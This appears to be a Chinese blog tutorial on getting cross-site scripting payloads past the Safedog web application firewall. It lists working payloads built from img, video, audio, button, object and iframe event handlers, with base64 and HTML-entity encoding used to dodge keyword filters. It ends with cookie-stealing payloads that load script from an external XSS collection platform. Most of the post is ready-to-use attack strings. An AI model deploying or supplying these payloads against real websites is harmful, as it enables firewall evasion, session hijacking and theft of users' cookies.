xss过waf(以安全狗为例)

xss过waf(以安全狗为例)

0x01. Bypass原理:
**原理:**我们知道安全狗会检测一些常见的XSS测试关键词,比如script、alert等。我们可以找到一些效果跟script、alert一样的,且未被安全狗拦截的语句去执行JS语句

  1. 测试script标签被拦截:
    在这里插入图片描述

0x02. Bypass安全狗:
1)测试标签,弹窗测试,成功弹窗

<img src=x onerror=alert(/img/)> 

在这里插入图片描述
2)测试prompt(用于显示可提示用户进行输入的对话框,可在alert被禁用的情况下代替)

<img src=x onerror=prompt(/img/)>

在这里插入图片描述3)测试video标签

<video src=x onerror=alert(/video/)>

在这里插入图片描述

4)测试audio标签

<audio src=x onerror=alert(/audio/)>

在这里插入图片描述
5)测试button标签点击事件

<button onclick=alert(1)>xss</button>

在这里插入图片描述
6)测试object标签搭配base64加密

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgvb2JqZWN0Lyk8L3NjcmlwdD4="></object>
base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    
      解码:<script>alert(1)</script>

在这里插入图片描述
7)测试iframe标签

&lt 表示左半括号 < 
&gt 表示右半括号 >
<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

在这里插入图片描述
0x03. 测试拿cookie
1)利用img标签执行js:

document.createElement('script'):创建元素动态插入script 
appendChild:方法向节点添加最后一个子节点
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="xss平台url">

在这里插入图片描述
1.2) 查看获取的数据:
在这里插入图片描述
2)利用object 标签执行js:

<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cHM6Ly94c3PlubPlj7B1cmw+PC9zY3JpcHQ+"></object>
解密:<script src=https://xss平台url></script>

在这里插入图片描述
2.2) 查看获取的数据:
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值